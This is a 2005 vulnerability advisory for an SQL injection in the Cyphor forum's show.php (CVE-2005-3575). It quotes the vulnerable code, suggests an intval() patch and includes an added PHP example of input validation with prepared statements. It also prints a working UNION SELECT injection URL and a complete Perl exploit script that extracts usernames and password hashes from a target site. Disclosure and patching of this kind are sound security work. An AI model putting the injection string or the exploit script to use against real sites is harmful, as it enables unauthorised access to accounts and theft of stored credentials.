Topic : Cyphor (Release: 0.19) SQL injection
SecurityAlert : 180
CVE : CVE-2005-3575
SecurityRisk : Medium
Remote Exploit : Yes
Local Exploit : No
Exploit Available : Yes
Credit : HACKERS PAL
Published : 15.11.2005
Affected Software : Cyphor (Release: 0.19) and all Versions Up To now
Advisory Content :
Hello
This is an SQL injection in Cyphor
Discovered by : HACKERS PAL
Greets For Devil-00 - Abducter - Almaster
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Injected versions :-
Cyphor (Release: 0.19) and all Versions Up To now
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
injected File
show.php
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
injection code :-
show.php?fid=2&id=-10%20union%20select%20id,null,null,null,null,nick,password,null,null,null%20from%20users%20where%20id=1
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Discovering the vulnerability :-
Looking in the show.php file, lines 59 to 62, as below
[code]
if ($id) {
    // a message with id=$id will be displayed
    $message_mode = 1;
    $query = "SELECT * FROM $db_table_name WHERE id=$id";
[/code]
The programmer didn't check the $id variable .. whether it was an integer
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
How to protect :-
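after
$message_mode = 1;
add
[code]
// Script Protection By : HACKERS PAL
// Cast $id to an integer so it can no longer carry SQL text
$id=intval($id);
// Stop if the cast result is 0 (non-numeric or empty input)
if(!$id)
{
die("<br>We Dont allow Skript Kidz .. <br> By <a href='Http://www.sqor.net'>HACKERS PAL</a>");
}
// Script Protection By : HACKERS PAL finished
[/code]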
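The fix above works because `intval()` keeps only the leading number of its input, so the injected request turns into a lookup for `id=-10`; the `die()` branch is reached only for zero or non-numeric input. The following is an added example, not code from Cyphor or from the advisory's author, showing that behaviour next to a stricter variant that validates with `filter_var()` and binds the value through PDO. The in-memory SQLite table, its row and the `fetch_message()` helper are assumptions made for illustration.

```php
<?php
// Added example. The schema, the row and fetch_message() are constructed
// for illustration; they are not Cyphor's real tables or code.
$pdo = new PDO('sqlite::memory:');
$pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$pdo->exec('CREATE TABLE messages (id INTEGER PRIMARY KEY, title TEXT, body TEXT)');
$pdo->exec("INSERT INTO messages VALUES (7, 'hello', 'first post')");

// Strict variant: accept only a positive integer, then bind it as a
// parameter so the value is never parsed as SQL.
function fetch_message(PDO $pdo, $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // not a positive integer: treat as "no such message"
    }
    $stmt = $pdo->prepare('SELECT id, title, body FROM messages WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// The id parameter from the advisory's request, URL-decoded.
$injected = '-10 union select id,null,null,null,null,nick,password,null,null,null from users where id=1';

// What the advisory's patch does with it: intval() keeps only the leading
// number, so the UNION text never reaches the query.
var_dump(intval($injected));
// Non-numeric input: this is the case the patch's die() branch catches.
var_dump(intval('abc'));

// What the strict variant does: the injected value is rejected outright,
// while a well-formed id still returns its row.
var_dump(fetch_message($pdo, $injected));
var_dump(fetch_message($pdo, '7'));
```

Run it with the PHP CLI and the `pdo_sqlite` extension enabled.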
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
exploit :-
#!/bin/env perl
#//-----------------------------------------------------------#
#// Cyphor Forum SQL Injection Exploit .. By HACKERS PAL
#// Greets For Devil-00 - Abducter - Almaster
#// http://WwW.SoQoR.NeT
#//-----------------------------------------------------------#
use LWP::Simple;
print "\n#####################################################";
print "\n# Cyphor Forum Exploit By : HACKERS PAL #";
print "\n# Http://WwW.SoQoR.NeT #";
if(!$ARGV[0]||!$ARGV[1]) {
print "\n# -- Usage: #";
print "\n# -- perl $0 [Full-Path] 1 #";
print "\n# -- Example: #";
print "\n# -- perl $0 http://www.cynox.ch/cyphor/forum/ 1#";
print "\n# Greets To Devil-00 - Abducter - almastar #";
print "\n#####################################################\n";
exit(0);
}
else
{
print "\n# Greets To Devil-00 - Abducter - almastar #";
print "\n#####################################################\n";
$web=$ARGV[0];
$id=$ARGV[1];
$url = "show.php?fid=2&id=-10%20union%20select%20id,2,3,4,5,nick,password,8,id,10%20from%20users%20where%20id=$id";
$site="$web/$url";
$page = get($site) || die "[-] Unable to retrieve: $!";
print "\n[+] Connected to: $ARGV[0]\n";
print "[+] User ID is : $id ";
$page =~ m/<span class=bigh>(.*?)<\/span>/ && print "\n[+] User Name is: $1\n";
print "\n[-] Unable to retrieve User Name\n" if(!$1);
$page =~ m/<span class=message>(.*?)<\/span>/ && print "[+] Hash of password is: $1\n";
print "[-] Unable to retrieve hash of password\n" if(!$1);
}
print "\n\nGreets From HACKERS PAL To you :)\nWwW.SoQoR.NeT . . . You Are Welcome\n\n";
#finished